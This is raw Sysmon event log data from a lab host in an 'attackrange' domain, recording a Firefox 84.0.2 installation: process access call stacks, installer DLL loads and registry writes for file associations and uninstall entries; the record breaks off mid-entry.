13:59:53.130{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-9459-6005-2E05-00000000A301}2680C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\nsExec.dll+149e(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\nsExec.dll+102b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 154100x800000000000000016208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.131{59A5CD1D-9459-6005-2E05-00000000A301}2680C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe84.0.2Mozilla Maintenance Service InstallerFirefoxMozilla Corporationmaintenanceservice_installer.exe"C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe"C:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=78B4EB752D8B6860D7481323E86D5C4E,SHA256=AAA54F4FB3A04C11B735397F1DCEBC9D076A2E88A6FC3A8485C8A9206C37CA19,IMPHASH=E2A592076B17EF8BFB48B7E03965A3FC{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe.\setup.exe /LaunchedFromStub /INI=C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\config.ini 10341000x800000000000000016207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.130{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-9459-6005-2E05-00000000A301}2680C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000016206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:53.114{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\nsExec.dll2021-01-18 13:59:53.114 13241300x800000000000000016205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1042SetValue2021-01-18 13:59:53.114{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeHKCR\Applications\firefox.exe\shell\open\command\(Default)"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "%%1" 13241300x800000000000000016204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1042SetValue2021-01-18 13:59:53.099{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeHKLM\SOFTWARE\Clients\StartMenuInternet\Firefox-308046B0AF4A39CB\shell\safemode\command\(Default)"C:\Program Files\Mozilla Firefox\firefox.exe" -safe-mode 13241300x800000000000000016203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1042SetValue2021-01-18 13:59:53.099{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeHKLM\SOFTWARE\Clients\StartMenuInternet\Firefox-308046B0AF4A39CB\shell\properties\command\(Default)"C:\Program Files\Mozilla Firefox\firefox.exe" -preferences 
13241300x800000000000000016202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1042SetValue2021-01-18 13:59:53.099{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeHKLM\SOFTWARE\Clients\StartMenuInternet\Firefox-308046B0AF4A39CB\shell\open\command\(Default)"C:\Program Files\Mozilla Firefox\firefox.exe" 13241300x800000000000000016201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1122SetValue2021-01-18 13:59:53.099{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeHKCR\FirefoxURL-308046B0AF4A39CB\shell\open\ddeexec\(Default)(Empty) 13241300x800000000000000016200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1042SetValue2021-01-18 13:59:53.099{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeHKCR\FirefoxURL-308046B0AF4A39CB\shell\open\command\(Default)"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "%%1" 13241300x800000000000000016199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1122SetValue2021-01-18 13:59:53.099{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeHKCR\FirefoxHTML-308046B0AF4A39CB\shell\open\ddeexec\(Default)(Empty) 13241300x800000000000000016198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1042SetValue2021-01-18 13:59:53.099{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeHKCR\FirefoxHTML-308046B0AF4A39CB\shell\open\command\(Default)"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "%%1" 13241300x800000000000000016197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:53.067{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 84.0.2 (x64 
de)\URLUpdateInfohttps://www.mozilla.org/firefox/84.0.2/releasenotes 13241300x800000000000000016196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localInvDB-PubSetValue2021-01-18 13:59:53.067{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 84.0.2 (x64 de)\PublisherMozilla 11241100x800000000000000016195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:53.052{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\AccessControl.dll2021-01-18 13:59:53.052 13241300x800000000000000016194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1122SetValue2021-01-18 13:59:53.036{59A5CD1D-9458-6005-2D05-00000000A301}1508C:\Windows\system32\regsvr32.exeHKCR\CLSID\{DCA8D857-1A63-4045-8F36-8809EB093D04}\InProcServer32\(Default)C:\Program Files\Mozilla Firefox\AccessibleHandler.dll 10341000x800000000000000016193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\